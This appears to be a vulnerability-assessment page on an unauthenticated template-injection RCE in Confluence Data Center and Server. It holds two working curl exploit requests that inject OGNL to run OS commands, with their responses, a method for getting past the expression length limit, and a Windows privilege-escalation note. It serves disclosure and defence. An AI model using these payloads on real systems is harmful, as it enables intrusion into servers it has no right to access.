A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.

Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.

Recent assessments:

zeroSteiner at January 24, 2024 7:20pm UTC reported:

Overview

A vulnerability exists within Atlassian Confluence which enables a remote and unauthenticated attacker to achieve OS command execution in the context of the application. The vulnerability is due to the text-inline.vm velocity template allowing the label parameter to be passed to an OGNL-sink. By using the technique published by Rahul Maini and Harsh Jaiswal of ProjectDiscovery, an attacker can break out of the sandbox enforced by Struts using the .KEY_velocity.struts2.context value exposed within the request. This was the basis for many of the public PoCs which followed the pattern demonstrated below.

curl --location 'http://localhost:8090/template/aui/text-inline.vm' \
--header 'X-Cmd-In: touch /tmp/cmd_in' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--header 'Cookie: JSESSIONID=7EC7F710425BEBB71F71363591CD03BD' \
--data-urlencode 'label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.p1,{})+\u0027' \
--data-urlencode '[email protected]@getResponse().setHeader('\''Cmd-Ret'\'',(new freemarker.template.utility.Execute()).exec({"id"}))'

HTTP/1.1 200 
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Confluence-Request-Time: 1706122679440
Cmd-Ret: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence) 
X-Accel-Buffering: no
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Wed, 24 Jan 2024 18:57:59 GMT

As noted by ProjectDiscovery in their writeup, however, there is a 200-character limit on the OGNL expressions that are evaluated. In the previous example, this means that the length of the p1 parameter can not exceed 200 characters, meaning the OS command can not exceed 70 characters unless the command results are omitted from the response headers. An additional parameter can also be referenced to bypass this restriction, removing the 200 character limit from the OS command payload. In the following example, the p2 parameter contains the OS command, which is not subject to the 200-character limit and also has fewer character restrictions, making it easier to encode more complex command payloads.

curl -i --location 'http://localhost:8090/template/aui/text-inline.vm' \
--header 'X-Cmd-In: touch /tmp/cmd_in' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--header 'Cookie: JSESSIONID=7EC7F710425BEBB71F71363591CD03BD' \
--data-urlencode 'label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.p1,{})+\u0027' \
--data-urlencode '[email protected]@getResponse().setHeader('\''Cmd-Ret'\'',(new freemarker.template.utility.Execute()).exec({@org.apache.struts2.ServletActionContext@getRequest().getParameter('\''p2'\'')}))' \
--data-urlencode 'p2=sh -c $@|sh . echo id'

HTTP/1.1 200 
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Confluence-Request-Time: 1706122962559
Cmd-Ret: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence) 
X-Accel-Buffering: no
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Wed, 24 Jan 2024 19:02:42 GMT

This vulnerability also affects Windows systems. When installed on Microsoft Windows, Confluence will by default run as NT AUTHORITY\NETWORK SERVICE. An attacker can easily use namedpipe impersonation to target the RPCSS process to elevate themselves to NT AUTHORITY\SYSTEM. This well-documented privilege escalation technique makes this exploit valuable to attackers when targeting installations on Windows.

Remediation

This vulnerability was patched in version 8.5.4, 8.6.0 and 8.7.1. For complete version information, see CONFSERVER=93833.

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5